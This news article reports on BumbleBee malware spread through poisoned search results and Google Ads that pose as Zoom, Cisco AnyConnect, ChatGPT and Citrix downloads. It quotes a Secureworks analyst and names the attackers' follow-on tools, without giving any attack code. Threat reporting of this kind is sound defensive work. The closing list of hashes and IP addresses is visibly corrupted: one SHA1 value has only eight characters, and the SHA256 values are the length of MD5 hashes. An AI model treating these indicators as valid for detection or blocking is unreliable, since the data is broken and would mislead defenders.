The bumblebee malware, first spotted last year targeting enterprise users is now distributed via SEO poisoning and Google Ads, which promote popular software such as Zoom, Cisco AnyConnect, the Chat GPT and Citrix Workspace.
A new version of the BumbleBee malware was recently discovered in the wild, with a more stealthy attack chain that used the PowerSploit framework for reflective DLL injection into memory. This allows the malware to load into memory without being detected by existing antivirus products, making detection and prevention more difficult.
“Remote workers might be looking to install new software on their home IT setup. For a quick solution they could look online, rather than go through their tech team – if they even have one. But research shows that as many as one in every 100 adverts online contains malicious content,” said Mike McLellan, director of intelligence at the Secureworks CTU.
“As people look for new tech, or want to get involved with the hype around new tech like ChatGPT, Google is the place to go to find it. Malicious ads returned in search results are incredibly hard to spot, even for someone with deep technical knowledge.”
The tools that the attackers deployed in the compromised environment include the Cobalt Strike pen-test suite, the remote tools access AnyDesk and LadyWare, network scanning utilities, a AD database dumper and a Kerberos credential stealer.
The Secureworks team recommends that as threat actors ramp up their use of online ads and SEO poisoning techniques, organisations move to protect their teams, especially remote users, and networks by implementing restrictions and controls that limit the ability to click on Google adverts.
e4a5383ac32d5642eaf2c7406a0f1c0f – MD5 hash
d5c26186 – SHA1 hash
d99b63e1740aa4f779b91d22f508a479 – SHA256 hash
6f7e07b84897cccab30594305416d36f – MD5 hash
6d1d531c921a17b36e792e2843311e27 – SHA256 hash
220.127.116.11 – IP address
18.104.22.168 – IP address
22.214.171.124:443 – IP address:port
126.96.36.199:443 – IP address:port